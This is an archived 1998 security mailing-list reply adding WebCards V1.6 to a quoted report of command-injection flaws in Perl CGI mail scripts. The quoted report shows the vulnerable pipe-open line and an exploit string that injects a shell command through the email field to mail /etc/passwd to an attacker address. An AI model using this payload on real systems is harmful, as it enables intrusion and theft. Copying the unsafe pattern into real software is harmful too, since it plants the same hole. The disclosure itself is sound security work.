G'day, As a related note, the WebCards program (V1.6) by Sam Kareem (webmasterat_private) is subject to the same vunerability. Regards, Karl On Mon, 9 Nov 1998, xnec wrote: > INFO: > After looking over the perl-CGI scripts on www.cgi-resources.com, > I've discovered vulnerabilities in the following: > -----Snip----8<----------------- > > EXPLOIT: > > Each of these are exploitable by inputing metacharacters into the > recipient's email address. Each script calls something similar > to: > > open( MAIL, "|$mailprog $email" ) > # this particular line is from the LakeWeb scripts > > The exploit strings are simple, something like > &mail evilat_private < /etc/passwd&@host.com will work for each script > (the @host.com is necessary because some hosts check for "@" and ".") > when placed in the Recipient Email field. > -----Snip-----8<---------------
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:22:40 PDT